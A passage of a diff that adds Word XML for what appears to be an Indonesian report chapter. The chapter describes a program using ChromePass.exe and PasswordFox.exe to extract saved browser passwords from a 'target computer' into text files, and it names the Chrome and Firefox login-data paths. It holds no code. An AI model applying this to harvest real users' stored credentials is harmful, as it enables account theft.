+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69CC0C8E" wp14:editId="610C1497">
+            <wp:extent cx="4603806" cy="2414417"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
+            <wp:docPr id="40" name="Picture 40"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4615104" cy="2420342"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="431"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="122" w:name="_Toc43194860"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Perintah Menjalankan Program</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="122"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Baik ChromePass.exe maupun PasswordFox.exe </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dapat mengambil data password berdasarkan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>login data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">masing-masing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> yang tersimpan pada penyimpanan lokal komputer. Google Chrome menyimpan login data yang disimpan pengguna pada direktori berikut: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>C:\Users\HP-PC\AppData\Local\Google\Chrome\User Data\Default</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Adapun Mozilla Firefox menyimpan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>login data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pengguna pada direktori:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>C:\Users\HP-PC\AppData\Roaming\Mozilla\Firefox\Profiles</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V-11 dan V-12 berikut ini menampilkan isi dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">login data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tersebut.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21F127A3" wp14:editId="6948EC31">
+            <wp:extent cx="4595854" cy="2494197"/>
+            <wp:effectExtent l="19050" t="19050" r="14605" b="20955"/>
+            <wp:docPr id="51" name="Picture 51"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4614592" cy="2504366"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Login Data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada Google Chrome</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55DA444E" wp14:editId="201AF172">
+            <wp:extent cx="4614545" cy="2499691"/>
+            <wp:effectExtent l="19050" t="19050" r="14605" b="15240"/>
+            <wp:docPr id="52" name="Picture 52"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4630144" cy="2508141"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="720" w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>11</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Login Data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pada Mozilla Firefox</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="37"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Komputer Target </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Memiliki Kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Browser</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Pada Gambar V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ditampilkan hasil program yang berhasil dijalankan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dengan kondisi komputer target memiliki kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>terinstal sehingga</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ChromePass.txt dan PasswordFox.txt berhasil dibuat untuk menyimpan data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">browser </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Google Chrome dan Mozilla Firefox.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E6D54A6" wp14:editId="3B143F50">
+            <wp:extent cx="4155385" cy="2255152"/>
+            <wp:effectExtent l="19050" t="19050" r="17145" b="12065"/>
+            <wp:docPr id="42" name="Picture 42"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4166581" cy="2261228"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="698" w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Hasil Pengambilan Data dalam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>File</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="37"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Komputer Target Hanya Memiliki Google Chrome</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="123" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="123"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="37"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Komputer Target Hanya Memiliki </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Mozilla Firefox</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="37"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Komputer Target </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tidak Memiliki Kedua </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Browser</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1418"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709" w:firstLine="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
